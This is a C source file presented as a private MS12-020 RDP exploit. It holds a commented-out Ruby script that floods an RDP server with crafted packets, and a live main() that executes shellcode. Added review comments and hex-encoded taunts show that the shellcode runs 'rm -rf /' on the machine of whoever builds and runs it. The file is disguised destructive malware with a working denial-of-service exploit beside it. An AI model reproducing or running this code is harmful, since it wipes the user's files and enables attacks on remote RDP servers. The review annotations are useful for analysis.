ms12-020_PRIVATE.c
  1. ## ms12-020.c
  2. # change offset in main before compiling
  3. # 64bit shellcode available soon
  4. /*
  5. require 'socket'
  6.  
  7. def send_tpkt(sd, data)
  8.   sd.write(make_tpkt(data))
  9. end
  10.  
  11. def make_tpkt(data)
  12.   [
  13.     3,  # version
  14.     0,  # reserved
  15.     4 + data.length
  16.   ].pack('CCn') + data
  17. end
  18.  
  19. def make_x224(data)
  20.   [ data.length ].pack('C') + data
  21. end
  22.  
  23. def make_rdp(type, flags, data)
  24.   [ type, flags, 4 + data.length ].pack('CCv') + data
  25. end
  26.  
  27. host = ARGV.shift
  28.  
  29. sd = TCPSocket.new(host, 3389)
  30. pkts1 = []
  31.  
  32. # craft connection request
  33. rdp = make_rdp(1, 0, [ 0 ].pack('V'))
  34. x224_1 = make_x224([
  35.   0xe0,  # Connection request
  36.   0,     # ??
  37.   0,     # SRC-REF
  38.   0      # Class : Class 0
  39. ].pack('CnnC') + rdp)
  40.  
  41. pkts1 << make_tpkt(x224_1)
  42.  
  43. # craft connect-initial
  44. x224_2 = make_x224([
  45.   0xf0,  # Data / Class 0
  46.   0x80   # EOT: True / NR: 0
  47. ].pack('CC'))
  48.  
  49. # mcsCi
  50. target_params = ""+
  51.   #"\x02\x01\x00"+     # maxChannelIds
  52.   "\x02\x01\x22"+  # maxChannelIds
  53.   "\x02\x01\x0a"+  # maxUserIds
  54.   "\x02\x01\x00"+  # maxTokenIds
  55.   "\x02\x01\x01"+  # numPriorities
  56.   "\x02\x01\x00"+  # minThroughput
  57.   "\x02\x01\x01"+  # maxHeight
  58.   "\x02\x02\xff\xff"+          # maxMCSPDUSize
  59.   "\x02\x01\x02"   # protocolVersion
  60. min_params = ""+
  61.   "\x02\x01\x01"+  # maxChannelIds
  62.   "\x02\x01\x01"+  # maxUserIds
  63.   "\x02\x01\x01"+  # maxTokenIds
  64.   "\x02\x01\x01"+  # numPriorities
  65.   "\x02\x01\x00"+  # minThroughput
  66.   "\x02\x01\x01"+  # maxHeight
  67.   "\x02\x02\x04\x20"+          # maxMCSPDUSize
  68.   "\x02\x01\x02"   # protocolVersion
  69. max_params = ""+
  70.   "\x02\x02\xff\xff"+          # maxChannelIds
  71.   "\x02\x02\xfc\x17"+          # maxUserIds
  72.   "\x02\x02\xff\xff"+          # maxTokenIds
  73.   "\x02\x01\x01"+  # numPriorities
  74.   "\x02\x01\x00"+  # minThroughput
  75.   "\x02\x01\x01"+  # maxHeight
  76.   "\x02\x02\xff\xff"+          # maxMCSPDUSize
  77.   "\x02\x01\x02"   # protocolVersion
  78.  
  79. userdata = ""+
  80.   # gccCCrq
  81.   "\x00\x05\x00\x14"+
  82.   "\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63"+"\x61\x81\x1c"+
  83.   # clientCoreData
  84.   "\x01\xc0"+"\xd8\x00"+  # header (type, len)
  85.     "\x04\x00"+"\x08\x00"+ # version
  86.     "\x80\x02"+ # desktop width
  87.     "\xe0\x01"+ # desktop height
  88.     "\x01\xca"+ # color depth
  89.     "\x03\xaa"+ # SASSequence
  90.     "\x09\x04\x00\x00" + # keyboard layout
  91.     "\xce\x0e\x00\x00" + # client build number
  92.     # client name
  93.     "\x48\x00\x4f\x00\x53\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  94.     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  95.     "\x04\x00\x00\x00"+ # keyboard type
  96.     "\x00\x00\x00\x00"+ # kbd subType
  97.     "\x0c\x00\x00\x00"+ # kbd FuncKey
  98.     # imeFileName
  99.     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  100.     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  101.     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  102.     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  103.     "\x01\xca"+ # postBeta2ColorDepth
  104.     "\x01\x00"+ # clientProductId
  105.     "\x00\x00\x00\x00" + # serialNumber
  106.     "\x10\x00"+ # highColorDepth
  107.     "\x07\x00"+ # supportedColorDepths
  108.     "\x01\x00"+ # earlyCapabilityFlags
  109.     # clientDigProductId -poc has: "00000-000-0000000-00000"
  110.     "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00"+
  111.     "\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"+
  112.     "\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00"+
  113.     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  114.     "\x00"+ # connectionType
  115.     "\x00"+ # pad1octet
  116.     "\x00\x00\x00\x00"+ # serverSelectedProtocol
  117.     "\x04\xc0\x0c\x00"+ # desktopPhysicalWidth
  118.     "\x0d\x00\x00\x00"+ # desktopPhysicalHeight
  119.     "\x00\x00\x00\x00"+ # reserved
  120.   # clientSecurityData
  121.   "\x02\xc0"+"\x0c\x00"+ # header (type, len)
  122.     "\x1b\x00\x00\x00"+ # encryptionMethods
  123.     "\x00\x00\x00\x00"+ # extEncryptionMethods
  124.   # clientNetworkData
  125.   "\x03\xc0"+"\x2c\x00"+ # header (type, len)
  126.     "\x03\x00\x00\x00"+ # channel count!
  127.     # channel 0
  128.     "rdpdr\x00\x00\x00"+ # name
  129.     "\x00\x00\x80\x80"+  # options
  130.     # channel 1
  131.     "cliprdr\x00"+       # name
  132.     "\x00\x00\xa0\xc0"+  # options
  133.     # channel 2
  134.     "rdpsnd\x00\x00"+    # name
  135.     "\x00\x00\x00\xc0"   # options
  136.   # clientClusterData (not present)
  137.   # clientMonitorData (not present)
  138.  
  139. mcs_data = ""+
  140.     "\x04\x01\x01"+ # callingDomainSelector
  141.     "\x04\x01\x01"+ # calledDomainSelector
  142.     "\x01\x01\xff"+ # upwardFlag
  143.   "\x30" + [ target_params.length ].pack('C') + target_params +
  144.   "\x30\x41\x41" + [ min_params.length ].pack('C') + min_params +
  145.   "\x30" + [ max_params.length ].pack('C') + max_params +
  146.   # userData
  147.   "\x04\x82" + [ userdata.length ].pack('n') + userdata
  148.  
  149. mcs = "\x7f\x65\x82" + [ mcs_data.length ].pack('n')  # connect-initial (0x65 / 101), length
  150. mcs << mcs_data
  151.  
  152. pkts1 << make_tpkt(x224_2 + mcs)
  153.  
  154. # send a special one?
  155. #pkts1 << &nerf <<*zarfoo << make_tpkt(x224_2 + "\x04\x01\x00\x01\x00")
  156.  
  157. # send more pkts! - based on poc
  158. 8.times {
  159.   pkts1 << make_tpkt(x224_2 + "\x28")
  160. }
  161.  
  162. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xea")
  163. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xeb")
  164. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xec")
  165. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xed")
  166. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xee")
  167. pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf0")
  168. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf1")
  169. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf2")
  170. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf3")
  171.  
  172. pkts1 << make_tpkt(x224_2 + "\x21\x80")
  173.  
  174. bigpkt = pkts1.join('')
  175.  
  176. 20.times { |x|
  177.   puts "[*] Sending #{x + 1} ..."
  178.   sd.write(bigpkt)
  179.  
  180.   send_tpkt(sd, x224_2 + "\x2e\x00\x00\x01")
  181.   #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x02")
  182.   #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x03")
  183.   #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x04")
  184.  
  185.   # read connect-initial response
  186.   buf = sd.recv(1500)
  187.   # XXX: TODO: check response =)
  188.   #puts buf
  189. }
  190.  
  191. sd.close
  192. */
  193.  
  194. #\x64\x69\x65\x20\x73\x6b\x69\x64\x64\x69\x65\x20\x73\x63\x75\x6d
  195. #\x65\x6e\x6a\x6f\x79\x20\x79\x6f\x75\x72\x20\x72\x6d
/*
 * Program entry point, written in the pre-C99 form (implicit int return
 * type, no parameter list).
 *
 * NOTE(review): despite the file name, nothing in this function touches
 * RDP.  The Ruby shown in the block comment above is inside a C comment
 * and is never compiled or executed; the only live code is this function.
 *
 * NOTE(review): decoded as 32-bit x86 Linux machine code, the byte string
 * below pushes the strings "/bin//rm", "-r", "-f" and "/" onto the stack,
 * builds an argv from them and issues the execve system call
 * (eax = 11, int 0x80).  In other words, running the compiled binary
 * attempts a recursive delete of everything the current user can remove on
 * the machine that runs it.  This matches the two hex-encoded comment lines
 * just above ("die skiddie scum" / "enjoy your rm"), so the paste should be
 * treated as a booby-trapped sample rather than a proof of concept.
 */
main()
{
       /* Machine code stored as data in a writable, stack-resident array. */
       char shellcode[] =
               "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89"
               "\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68"
               "\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";
 
       /* Reinterpret the array as a function and call it, i.e. execute the
        * bytes above as native code.  This is undefined behaviour in C; on a
        * build with a non-executable stack the call would fault here instead
        * of running the payload, but that must not be relied on. */
       (*(void (*)()) shellcode)();
}